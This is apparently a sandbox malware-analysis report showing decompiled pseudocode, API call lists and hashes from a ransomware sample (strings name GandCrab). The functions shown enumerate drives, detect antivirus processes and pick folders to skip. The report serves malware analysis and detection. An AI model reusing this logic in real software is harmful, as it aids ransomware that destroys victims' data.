                                      				intOrPtr _t93;
                                      				signed int _t95;
                                      				intOrPtr _t100;
                                      				void* _t102;
                                      				void* _t104;
                                      				void* _t106;
                                      
                                      				_t102 = __esi;
                                      				_t93 = __edx;
                                      				_t51 = __eax;
                                      				do {
                                      					 *(_t104 - 0x24) =  *((intOrPtr*)(_t104 + _t51 * 2 - 0x80));
                                      					_t95 = GetDriveTypeW(_t104 - 0x24);
                                      					if(_t95 <= 2 || _t95 == 5) {
                                      						L6:
                                      					} else {
                                      						 *((short*)(_t104 - 0x20)) = 0;
                                      						lstrcatW( *(_t102 + 0x7c), _t104 - 0x24);
                                      						 *((short*)(_t104 - 0x20)) = 0x5c;
                                      						lstrcatW( *(_t102 + 0x7c),  *(_t104 + _t95 * 4 - 0x40));
                                      						lstrcatW( *(_t102 + 0x7c), "_");
                                      						if(GetDiskFreeSpaceW(_t104 - 0x24, _t104 - 0x1c, _t104 - 0x14, _t104 - 0xc, _t104 - 0x10) == 0) {
                                      							lstrcatW( *(_t102 + 0x7c), L"0,");
                                      							goto L6;
                                      						} else {
                                      							 *((intOrPtr*)(_t104 - 8)) = E00408470( *(_t104 - 0x10), 0,  *(_t104 - 0x1c) *  *(_t104 - 0x14), 0);
                                      							_t85 = _t93;
                                      							_t75 = E00408470( *(_t104 - 0xc), 0,  *(_t104 - 0x1c) *  *(_t104 - 0x14), 0);
                                      							_t100 =  *((intOrPtr*)(_t104 - 8));
                                      							 *((intOrPtr*)(_t104 - 4)) = _t100 - _t75;
                                      							asm("sbb eax, edx");
                                      							 *((intOrPtr*)(_t104 - 8)) = _t85;
                                      							_t77 = lstrlenW( *(_t102 + 0x7c));
                                      							_push(_t85);
                                      							wsprintfW( &(( *(_t102 + 0x7c))[_t77]), L"%I64u/", _t100);
                                      							_t80 = lstrlenW( *(_t102 + 0x7c));
                                      							_push( *((intOrPtr*)(_t104 - 8)));
                                      							wsprintfW( &(( *(_t102 + 0x7c))[_t80]), L"%I64u",  *((intOrPtr*)(_t104 - 4)));
                                      							_t106 = _t106 + 0x20;
                                      							lstrcatW( *(_t102 + 0x7c), ",");
                                      						}
                                      					}
                                      					_t51 =  *(_t104 - 0x18) + 1;
                                      					 *(_t104 - 0x18) = _t51;
                                      				} while (_t51 < 0x1b);
                                      				_t56 = lstrlenW( *(_t102 + 0x7c));
                                      				_t88 =  *(_t102 + 0x7c);
                                      				 *((short*)(_t88 + _t56 * 2 - 2)) = 0;
                                      				if( *(_t102 + 0x80) != 0) {
                                      					_t58 = VirtualAlloc(0, 0x81, 0x3000, 4);
                                      					 *(_t102 + 0x84) = _t58;
                                      					if(_t58 == 0) {
                                      						L13:
                                      						 *(_t102 + 0x80) = 0;
                                      					} else {
                                      						_push(_t88);
                                      						_t59 = E004068F0(_t58);
                                      						if(_t59 == 0) {
                                      							VirtualFree( *(_t102 + 0x84), _t59, 0x8000);
                                      							goto L13;
                                      						}
                                      					}
                                      				}
                                      				return 1;
                                      			}


















                                      0x00407369
                                      0x00407369
                                      0x00407369
                                      0x00407370
                                      0x00407375
                                      0x00407383
                                      0x00407388
                                      0x0040747b
                                      0x00407397
                                      0x00407399
                                      0x004073a4
                                      0x004073b2
                                      0x004073b6
                                      0x004073c0
                                      0x004073de
                                      0x00407479
                                      0x00000000
                                      0x004073e4
                                      0x00407400
                                      0x00407403
                                      0x00407405
                                      0x0040740a
                                      0x00407416
                                      0x00407419
                                      0x0040741b
                                      0x0040741e
                                      0x00407427
                                      0x00407438
                                      0x00407446
                                      0x00407448
                                      0x0040745a
                                      0x00407462
                                      0x0040746d
                                      0x0040746d
                                      0x004073de
                                      0x00407484
                                      0x00407485
                                      0x00407488
                                      0x00407494
                                      0x00407496
                                      0x0040749b
                                      0x004074a7
                                      0x004074b7
                                      0x004074bd
                                      0x004074c5
                                      0x004074e4
                                      0x004074e4
                                      0x004074c7
                                      0x004074c7
                                      0x004074c9
                                      0x004074d0
                                      0x004074de
                                      0x00000000
                                      0x004074de
                                      0x004074d0
                                      0x004074c5
                                      0x004074f9

                                      APIs
                                      • GetDriveTypeW.KERNEL32(?), ref: 0040737D
                                      • lstrcatW.KERNEL32(?,?), ref: 004073A4
                                      • lstrcatW.KERNEL32(?,0041073C), ref: 004073B6
                                      • lstrcatW.KERNEL32(?,004107B0), ref: 004073C0
                                      • GetDiskFreeSpaceW.KERNEL32(?,?,?,00000000,00404590), ref: 004073D6
                                      • lstrlenW.KERNEL32(?,00000000,00000000,?,00000000,00404590,00000000,?,00000000), ref: 0040741E
                                      • wsprintfW.USER32 ref: 00407438
                                      • lstrlenW.KERNEL32(?), ref: 00407446
                                      • wsprintfW.USER32 ref: 0040745A
                                      • lstrcatW.KERNEL32(?,004107D0), ref: 0040746D
                                      • lstrcatW.KERNEL32(?,004107D4), ref: 00407479
                                      • lstrlenW.KERNEL32(?), ref: 00407494
                                      • VirtualAlloc.KERNEL32(00000000,00000081,00003000,00000004), ref: 004074B7
                                      • VirtualFree.KERNEL32(?,00000000,00008000,00000000), ref: 004074DE
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000015.00000002.305258673.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000015.00000002.305252568.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305265358.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305269157.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305274923.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305279189.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_21_2_400000_vkspii.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$lstrlen$FreeVirtualwsprintf$AllocDiskDriveSpaceType
                                      • String ID: %I64u$%I64u/
                                      • API String ID: 1496313530-2450085969
                                      • Opcode ID: f37d999d73b9fcab265fb1937d7ee25b9929f392ff6dfbe524c0eec2842da8f8
                                      • Instruction ID: f56a49131db2d010194e37aaef5b9fe43e36d368a28beff8943d66c84b1e197f
                                      • Opcode Fuzzy Hash: f37d999d73b9fcab265fb1937d7ee25b9929f392ff6dfbe524c0eec2842da8f8
                                      • Instruction Fuzzy Hash: A4418371A00608AFDB219BA4CD45FAEBBF9FF48300F10442AE655F32A1DA35F950CB19
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 93%
                                      			E00404EB0() {
                                      				intOrPtr _v8;
                                      				char* _v12;
                                      				char* _v16;
                                      				char* _v20;
                                      				char _v24;
                                      				intOrPtr _v28;
                                      				intOrPtr _v32;
                                      				char _v36;
                                      				char _v40;
                                      				intOrPtr _v44;
                                      				intOrPtr _v48;
                                      				char _v52;
                                      				char _v56;
                                      				char _v72;
                                      				WCHAR* _t26;
                                      				long _t33;
                                      				WCHAR* _t38;
                                      				signed int _t40;
                                      				signed int _t41;
                                      				void* _t46;
                                      				signed int _t50;
                                      				void* _t52;
                                      
                                      				asm("movdqa xmm0, [0x410960]");
                                      				_v20 =  &_v72;
                                      				_v16 =  &_v36;
                                      				_v36 = 0x69736d65;
                                      				_v32 = 0x74666f73;
                                      				_v28 = 0x7469622e;
                                      				_v24 = 0;
                                      				asm("movdqu [ebp-0x44], xmm0");
                                      				_v56 = 0;
                                      				_v52 = 0x646e6167;
                                      				_v48 = 0x62617263;
                                      				_v44 = 0x7469622e;
                                      				_v40 = 0;
                                      				_v12 =  &_v52;
                                      				_t26 = VirtualAlloc(0, 0x100, 0x3000, 4);
                                      				_t38 = _t26;
                                      				if(_t38 != 0) {
                                      					_t40 = 0;
                                      					_t50 = 0;
                                      					while(1) {
                                      						_v8 =  *((intOrPtr*)(_t52 + _t50 * 4 - 0x10));
                                      						_t50 =  ==  ? 0 : _t50 + 1;
                                      						if(_t40 == 0xffffffff) {
                                      							Sleep(0x2710);
                                      						}
                                      						_t46 = VirtualAlloc(0, 2 + lstrlenW(_t38) * 2, 0x3000, 4);
                                      						_t41 = _t46;
                                      						E00404D60(_t41, _v8);
                                      						_t33 = lstrcmpiA(_t46, "fabian wosar <3");
                                      						if(_t33 != 0) {
                                      							break;
                                      						}
                                      						VirtualFree(_t46, _t33, 0x8000);
                                      						_t40 = _t41 | 0xffffffff;
                                      					}
                                      					wsprintfW(_t38, L"%S", _t46);
                                      					VirtualFree(_t46, 0, 0x8000);
                                      					_t26 = _t38;
                                      				}
                                      				return _t26;
                                      			}

























                                      0x00404eb6
                                      0x00404ecc
                                      0x00404ed7
                                      0x00404ee4
                                      0x00404eeb
                                      0x00404ef2
                                      0x00404ef9
                                      0x00404efd
                                      0x00404f02
                                      0x00404f06
                                      0x00404f0d
                                      0x00404f14
                                      0x00404f1b
                                      0x00404f1f
                                      0x00404f22
                                      0x00404f24
                                      0x00404f28
                                      0x00404f2e
                                      0x00404f30
                                      0x00404f32
                                      0x00404f37
                                      0x00404f3f
                                      0x00404f45
                                      0x00404f4c
                                      0x00404f4c
                                      0x00404f6f
                                      0x00404f71
                                      0x00404f73
                                      0x00404f7e
                                      0x00404f86
                                      0x00000000
                                      0x00000000
                                      0x00404f8f
                                      0x00404f9b
                                      0x00404f9b
                                      0x00404fa7
                                      0x00404fb8
                                      0x00404fbe
                                      0x00404fbe
                                      0x00404fc6

                                      APIs
                                      • VirtualAlloc.KERNEL32(00000000,00000100,00003000,00000004,74CB6980,00000000,00000000), ref: 00404F22
                                      • Sleep.KERNEL32(00002710), ref: 00404F4C
                                      • lstrlenW.KERNEL32(00000000,00003000,00000004), ref: 00404F5A
                                      • VirtualAlloc.KERNEL32(00000000,00000000), ref: 00404F6A
                                      • lstrcmpiA.KERNEL32(00000000,fabian wosar <3), ref: 00404F7E
                                      • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00404F8F
                                      • wsprintfW.USER32 ref: 00404FA7
                                      • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00404FB8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000015.00000002.305258673.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000015.00000002.305252568.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305265358.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305269157.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305274923.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305279189.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_21_2_400000_vkspii.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Virtual$AllocFree$Sleeplstrcmpilstrlenwsprintf
                                      • String ID: .bit$.bit$crab$emsi$fabian wosar <3$gand$soft
                                      • API String ID: 2709691373-1090818981
                                      • Opcode ID: edd6b09a321c72d76f54713700b51503e045287bd620de7e5e9023b5f02d4a1f
                                      • Instruction ID: 12e809f3953ca4ef3e333bd49a631b39bc1f07fb3bc4506d08caa0eda9158355
                                      • Opcode Fuzzy Hash: edd6b09a321c72d76f54713700b51503e045287bd620de7e5e9023b5f02d4a1f
                                      • Instruction Fuzzy Hash: 34317AB1A04319ABDB11DFA4AD45BAEBBB8FB84710F10013AF701B72D1D7B45905CB99
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 80%
                                      			E00407520(void** _a4, intOrPtr* _a8) {
                                      				signed int _v8;
                                      				long _v12;
                                      				long _v16;
                                      				void* _v20;
                                      				void* _v24;
                                      				WCHAR* _v28;
                                      				WCHAR* _v32;
                                      				WCHAR* _v36;
                                      				WCHAR* _v40;
                                      				WCHAR* _v44;
                                      				WCHAR* _v48;
                                      				WCHAR* _v52;
                                      				WCHAR* _v56;
                                      				WCHAR* _v60;
                                      				WCHAR* _v64;
                                      				WCHAR* _v68;
                                      				WCHAR* _v72;
                                      				WCHAR* _v76;
                                      				WCHAR* _v80;
                                      				void* _t46;
                                      				void* _t49;
                                      				WCHAR* _t56;
                                      				void** _t68;
                                      				void* _t75;
                                      				long _t76;
                                      				WCHAR* _t77;
                                      				signed int _t79;
                                      				void* _t83;
                                      
                                      				_t46 = VirtualAlloc(0, 0x400, 0x3000, 4);
                                      				_t68 = _a4;
                                      				 *_t68 = _t46;
                                      				_v80 = L"AVP.EXE";
                                      				_v76 = L"ekrn.exe";
                                      				_v72 = L"avgnt.exe";
                                      				_v68 = L"ashDisp.exe";
                                      				_v64 = L"NortonAntiBot.exe";
                                      				_v60 = L"Mcshield.exe";
                                      				_v56 = L"avengine.exe";
                                      				_v52 = L"cmdagent.exe";
                                      				_v48 = L"smc.exe";
                                      				_v44 = L"persfw.exe";
                                      				_v40 = L"pccpfw.exe";
                                      				_v36 = L"fsguiexe.exe";
                                      				_v32 = L"cfp.exe";
                                      				_v28 = L"msmpeng.exe";
                                      				_t75 = VirtualAlloc(0, 4, 0x3000, 4);
                                      				_v24 = _t75;
                                      				if(_t75 == 0) {
                                      					L3:
                                      					return 0;
                                      				} else {
                                      					 *_t75 = 0x22c;
                                      					_t49 = CreateToolhelp32Snapshot(2, 0);
                                      					_v20 = _t49;
                                      					if(_t49 != 0xffffffff) {
                                      						_t79 = 0;
                                      						_push(_t75);
                                      						_v12 = 0;
                                      						_a4 = 0;
                                      						_v16 = 0;
                                      						_v8 = 0;
                                      						if(Process32FirstW(_t49) != 0) {
                                      							L6:
                                      							while(_t79 == 0) {
                                      								_t77 = _t75 + 0x24;
                                      								while(lstrcmpiW( *(_t83 + _t79 * 4 - 0x4c), _t77) != 0) {
                                      									_t79 = _t79 + 1;
                                      									if(_t79 < 0xe) {
                                      										continue;
                                      									} else {
                                      										_t79 = _v8;
                                      									}
                                      									L15:
                                      									_t75 = _v24;
                                      									if(Process32NextW(_v20, _t75) != 0 && GetLastError() != 0x12) {
                                      										goto L6;
                                      									}
                                      									goto L17;
                                      								}
                                      								_push(_t77);
                                      								_push( *_t68);
                                      								_v16 = 1;
                                      								if(_a4 != 0) {
                                      									lstrcatW();
                                      									lstrcatW( *_t68, ",");
                                      								} else {
                                      									lstrcpyW();
                                      									lstrcatW( *_t68, ",");
                                      								}
                                      								_a4 =  &(_a4[0]);
                                      								_v12 = _v12 + lstrlenW(_t77) * 2;
                                      								_t79 =  >  ? 1 : _v8;
                                      								_v8 = _t79;
                                      								goto L15;
                                      							}
                                      							L17:
                                      							if(_v16 != 0) {
                                      								_t56 =  *_t68;
                                      								if( *_t56 != 0) {
                                      									 *((short*)( *_t68 + lstrlenW(_t56) * 2 - 2)) = 0;
                                      								}
                                      							}
                                      							 *_a8 = _v12;
                                      						}
                                      						VirtualFree(_t75, 0, 0x8000);
                                      						CloseHandle(_v20);
                                      						_t76 = _v16;
                                      						if(_t76 == 0) {
                                      							VirtualFree( *_t68, _t76, 0x8000);
                                      						}
                                      						return _t76;
                                      					} else {
                                      						VirtualFree(_t75, 0, 0x8000);
                                      						goto L3;
                                      					}
                                      				}
                                      			}































                                      0x0040753d
                                      0x0040753f
                                      0x0040754d
                                      0x0040754f
                                      0x00407556
                                      0x0040755d
                                      0x00407564
                                      0x0040756b
                                      0x00407572
                                      0x00407579
                                      0x00407580
                                      0x00407587
                                      0x0040758e
                                      0x00407595
                                      0x0040759c
                                      0x004075a3
                                      0x004075aa
                                      0x004075b3
                                      0x004075b5
                                      0x004075ba
                                      0x004075e4
                                      0x004075ea
                                      0x004075bc
                                      0x004075c0
                                      0x004075c6
                                      0x004075cc
                                      0x004075d2
                                      0x004075ef
                                      0x004075f1
                                      0x004075f3
                                      0x004075f6
                                      0x004075f9
                                      0x004075fc
                                      0x00407607
                                      0x00000000
                                      0x00407610
                                      0x00407618
                                      0x00407620
                                      0x0040762f
                                      0x00407633
                                      0x00000000
                                      0x00407635
                                      0x00407635
                                      0x00407635
                                      0x00407697
                                      0x00407697
                                      0x004076a6
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x004076a6
                                      0x0040763e
                                      0x0040763f
                                      0x00407641
                                      0x00407648
                                      0x00407665
                                      0x0040766e
                                      0x0040764a
                                      0x0040764a
                                      0x00407657
                                      0x00407657
                                      0x00407670
                                      0x0040768e
                                      0x00407691
                                      0x00407694
                                      0x00000000
                                      0x00407694
                                      0x004076b7
                                      0x004076bb
                                      0x004076bd
                                      0x004076c3
                                      0x004076d0
                                      0x004076d0
                                      0x004076c3
                                      0x004076db
                                      0x004076db
                                      0x004076eb
                                      0x004076f0
                                      0x004076f6
                                      0x004076fb
                                      0x00407705
                                      0x00407705
                                      0x0040770f
                                      0x004075d4
                                      0x004075dc
                                      0x00000000
                                      0x004075dc
                                      0x004075d2

                                      APIs
                                      • VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004,74CB66A0,?,7491C0B0), ref: 0040753D
                                      • VirtualAlloc.KERNEL32(00000000,00000004,00003000,00000004), ref: 004075B1
                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004075C6
                                      • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 004075DC
                                      • Process32FirstW.KERNEL32(00000000,00000000), ref: 004075FF
                                      • lstrcmpiW.KERNEL32(004107DC,-00000024), ref: 00407625
                                      • Process32NextW.KERNEL32(?,?), ref: 0040769E
                                      • GetLastError.KERNEL32 ref: 004076A8
                                      • lstrlenW.KERNEL32(00000000), ref: 004076C6
                                      • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 004076EB
                                      • CloseHandle.KERNEL32(?), ref: 004076F0
                                      • VirtualFree.KERNEL32(?,?,00008000), ref: 00407705
                                      Memory Dump Source
                                      • Source File: 00000015.00000002.305258673.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000015.00000002.305252568.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305265358.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305269157.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305274923.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305279189.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_21_2_400000_vkspii.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Virtual$Free$AllocProcess32$CloseCreateErrorFirstHandleLastNextSnapshotToolhelp32lstrcmpilstrlen
                                      • String ID:
                                      • API String ID: 2470459410-0
                                      • Opcode ID: 3f4a2b444d341badbc1f89ef671cf3f23f637359728da17f4d75482f5b004914
                                      • Instruction ID: 1c74ff85e4bbe89c11da167877251bfadadfb1b789393fb2674ad8a1102b1764
                                      • Opcode Fuzzy Hash: 3f4a2b444d341badbc1f89ef671cf3f23f637359728da17f4d75482f5b004914
                                      • Instruction Fuzzy Hash: DF514D71E04218ABDB109F98DD48B9E7BB4FF85720F20806AE505BB290C7B56D85CF99
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 15%
                                      			E00406110(void* __ecx) {
                                      				void* _t9;
                                      				intOrPtr* _t20;
                                      				void* _t42;
                                      				void* _t45;
                                      
                                      				_t42 = __ecx;
                                      				_t45 = VirtualAlloc(0, 0x201, 0x3000, 0x40);
                                      				if(E00407BA0(_t42, L"\\ProgramData\\") != 0 || E00407BA0(_t42, L"\\Program Files\\") != 0 || E00407BA0(_t42, L"\\Tor Browser\\") != 0 || E00407BA0(_t42, L"Ransomware") != 0 || E00407BA0(_t42, L"\\All Users\\") != 0) {
                                      					L15:
                                      					VirtualFree(_t45, 0, 0x8000);
                                      					return 0;
                                      				} else {
                                      					_t9 = E00407BA0(_t42, L"\\Local Settings\\");
                                      					if(_t9 != 0) {
                                      						goto L15;
                                      					} else {
                                      						_t20 = __imp__SHGetSpecialFolderPathW;
                                      						_push(_t9);
                                      						_push(0x2a);
                                      						_push(_t45);
                                      						_push(_t9);
                                      						if( *_t20() == 0 || E00407BA0(_t42, _t45) == 0) {
                                      							_push(0);
                                      							_push(0x2b);
                                      							_push(_t45);
                                      							_push(0);
                                      							if( *_t20() == 0 || E00407BA0(_t42, _t45) == 0) {
                                      								_push(0);
                                      								_push(0x24);
                                      								_push(_t45);
                                      								_push(0);
                                      								if( *_t20() == 0 || E00407BA0(_t42, _t45) == 0) {
                                      									_push(0);
                                      									_push(0x1c);
                                      									_push(_t45);
                                      									_push(0);
                                      									if( *_t20() == 0 || E00407BA0(_t42, _t45) == 0) {
                                      										VirtualFree(_t45, 0, 0x8000);
                                      										return 1;
                                      									} else {
                                      										goto L15;
                                      									}
                                      								} else {
                                      									goto L15;
                                      								}
                                      							} else {
                                      								goto L15;
                                      							}
                                      						} else {
                                      							goto L15;
                                      						}
                                      					}
                                      				}
                                      			}







                                      0x00406121
                                      0x00406130
                                      0x00406139
                                      0x00406228
                                      0x00406231
                                      0x0040623c
                                      0x0040618f
                                      0x00406196
                                      0x0040619d
                                      0x00000000
                                      0x004061a3
                                      0x004061a3
                                      0x004061a9
                                      0x004061aa
                                      0x004061ac
                                      0x004061ad
                                      0x004061b2
                                      0x004061c1
                                      0x004061c3
                                      0x004061c5
                                      0x004061c6
                                      0x004061cc
                                      0x004061db
                                      0x004061dd
                                      0x004061df
                                      0x004061e0
                                      0x004061e6
                                      0x004061f5
                                      0x004061f7
                                      0x004061f9
                                      0x004061fa
                                      0x00406200
                                      0x0040621c
                                      0x00406227
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x004061b2
                                      0x0040619d

                                      APIs
                                      • VirtualAlloc.KERNEL32(00000000,00000201,00003000,00000040,00000000,?,?,00406706,00000000,?,?), ref: 00406123
                                      • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000002A,00000000,?,?,00406706,00000000,?,?), ref: 004061AE
                                      • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000002B,00000000,?,?,00406706,00000000,?,?), ref: 004061C8
                                      • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,00000024,00000000,?,?,00406706,00000000,?,?), ref: 004061E2
                                      • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000,?,?,00406706,00000000,?,?), ref: 004061FC
                                      • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,00406706,00000000,?,?), ref: 0040621C
                                      • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,00406706,00000000,?,?), ref: 00406231
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000015.00000002.305258673.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000015.00000002.305252568.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305265358.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305269157.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305274923.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305279189.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_21_2_400000_vkspii.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FolderPathSpecial$Virtual$Free$Alloc
                                      • String ID: Ransomware$\All Users\$\Local Settings\$\Program Files\$\ProgramData\$\Tor Browser\
                                      • API String ID: 1363212851-106008693
                                      • Opcode ID: 04a06f1e15ba69642b496c6929e789c3ce974156cbd8b3f19c2c8875e9bacd52
                                      • Instruction ID: f4f5e37f6e05bfd3754b73729b88660f17dd9cd9e6b304112d3c6a2927df81c1
                                      • Opcode Fuzzy Hash: 04a06f1e15ba69642b496c6929e789c3ce974156cbd8b3f19c2c8875e9bacd52
                                      • Instruction Fuzzy Hash: F4213D3078021233EA2031662D6AB7F299E8BD5749F55447BBA02FA3C5FEBCEC15425D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 93%
                                      			E00406BA0(intOrPtr* __ecx) {
                                      				int _t42;
                                      				int _t48;
                                      				int _t51;
                                      				int _t54;
                                      				int _t57;
                                      				int _t60;
                                      				int _t63;
                                      				int _t66;
                                      				int _t70;
                                      				int _t72;
                                      				void* _t75;
                                      				intOrPtr* _t86;
                                      				int _t88;
                                      				int _t89;
                                      				int _t90;
                                      				int _t91;
                                      				int _t92;
                                      				int _t93;
                                      				int _t94;
                                      				void* _t95;
                                      
                                      				_t40 = lstrlenW;
                                      				_t86 = __ecx;
                                      				_t75 = 0;
                                      				if( *__ecx != 0) {
                                      					_t72 = lstrlenW( *(__ecx + 8));
                                      					_t3 = lstrlenW( *(_t86 + 4)) + 4; // 0x4
                                      					_t40 = lstrlenW;
                                      					_t75 = _t3 + _t72;
                                      				}
                                      				if( *((intOrPtr*)(_t86 + 0xc)) != 0) {
                                      					_t95 =  *_t40( *((intOrPtr*)(_t86 + 0x14)));
                                      					_t70 = lstrlenW( *(_t86 + 0x10));
                                      					_t7 = _t95 + 4; // 0x4
                                      					_t75 = _t7 + _t70 + _t75;
                                      				}
                                      				if( *((intOrPtr*)(_t86 + 0x18)) != 0) {
                                      					_t94 = lstrlenW( *(_t86 + 0x20));
                                      					_t66 = lstrlenW( *(_t86 + 0x1c));
                                      					_t11 = _t94 + 4; // 0x4
                                      					_t75 = _t11 + _t66 + _t75;
                                      				}
                                      				if( *((intOrPtr*)(_t86 + 0x24)) != 0) {
                                      					_t93 = lstrlenW( *(_t86 + 0x2c));
                                      					_t63 = lstrlenW( *(_t86 + 0x28));
                                      					_t15 = _t93 + 4; // 0x4
                                      					_t75 = _t15 + _t63 + _t75;
                                      				}
                                      				if( *((intOrPtr*)(_t86 + 0x30)) != 0) {
                                      					_t92 = lstrlenW( *(_t86 + 0x38));
                                      					_t60 = lstrlenW( *(_t86 + 0x34));
                                      					_t19 = _t92 + 4; // 0x4
                                      					_t75 = _t19 + _t60 + _t75;
                                      				}
                                      				if( *((intOrPtr*)(_t86 + 0x3c)) != 0) {
                                      					_t91 = lstrlenW( *(_t86 + 0x44));
                                      					_t57 = lstrlenW( *(_t86 + 0x40));
                                      					_t23 = _t91 + 4; // 0x4
                                      					_t75 = _t23 + _t57 + _t75;
                                      				}
                                      				if( *((intOrPtr*)(_t86 + 0x48)) != 0) {
                                      					_t90 = lstrlenW( *(_t86 + 0x50));
                                      					_t54 = lstrlenW( *(_t86 + 0x4c));
                                      					_t27 = _t90 + 4; // 0x4
                                      					_t75 = _t27 + _t54 + _t75;
                                      				}
                                      				if( *((intOrPtr*)(_t86 + 0x54)) != 0) {
                                      					_t89 = lstrlenW( *(_t86 + 0x5c));
                                      					_t51 = lstrlenW( *(_t86 + 0x58));
                                      					_t31 = _t89 + 4; // 0x4
                                      					_t75 = _t31 + _t51 + _t75;
                                      				}
                                      				if( *((intOrPtr*)(_t86 + 0x60)) != 0) {
                                      					_t75 = _t75 + 0x14;
                                      				}
                                      				if( *((intOrPtr*)(_t86 + 0x74)) != 0) {
                                      					_t88 = lstrlenW( *(_t86 + 0x7c));
                                      					_t48 = lstrlenW( *(_t86 + 0x78));
                                      					_t36 = _t88 + 4; // 0x4
                                      					_t75 = _t36 + _t48 + _t75;
                                      				}
                                      				if( *((intOrPtr*)(_t86 + 0x80)) == 0) {
                                      					return _t75;
                                      				} else {
                                      					_t42 = lstrlenW( *(_t86 + 0x88));
                                      					return lstrlenW( *(_t86 + 0x84)) + 4 + _t75 + _t42;
                                      				}
                                      			}























                                      0x00406ba0
                                      0x00406ba8
                                      0x00406baa
                                      0x00406bae
                                      0x00406bb3
                                      0x00406bc1
                                      0x00406bc4
                                      0x00406bc9
                                      0x00406bc9
                                      0x00406bcf
                                      0x00406bd9
                                      0x00406be0
                                      0x00406be4
                                      0x00406be7
                                      0x00406be7
                                      0x00406bed
                                      0x00406bfb
                                      0x00406bfd
                                      0x00406c05
                                      0x00406c08
                                      0x00406c08
                                      0x00406c0e
                                      0x00406c1c
                                      0x00406c1e
                                      0x00406c26
                                      0x00406c29
                                      0x00406c29
                                      0x00406c2f
                                      0x00406c3d
                                      0x00406c3f
                                      0x00406c47
                                      0x00406c4a
                                      0x00406c4a
                                      0x00406c50
                                      0x00406c5e
                                      0x00406c60
                                      0x00406c68
                                      0x00406c6b
                                      0x00406c6b
                                      0x00406c71
                                      0x00406c7f
                                      0x00406c81
                                      0x00406c89
                                      0x00406c8c
                                      0x00406c8c
                                      0x00406c92
                                      0x00406ca0
                                      0x00406ca2
                                      0x00406caa
                                      0x00406cad
                                      0x00406cad
                                      0x00406cb3
                                      0x00406cb5
                                      0x00406cb5
                                      0x00406cbc
                                      0x00406cca
                                      0x00406ccc
                                      0x00406cd4
                                      0x00406cd7
                                      0x00406cd7
                                      0x00406ce0
                                      0x00406d0c
                                      0x00406ce2
                                      0x00406ce8
                                      0x00406d06
                                      0x00406d06

                                      APIs
                                      • lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406BF2
                                      • lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406BFD
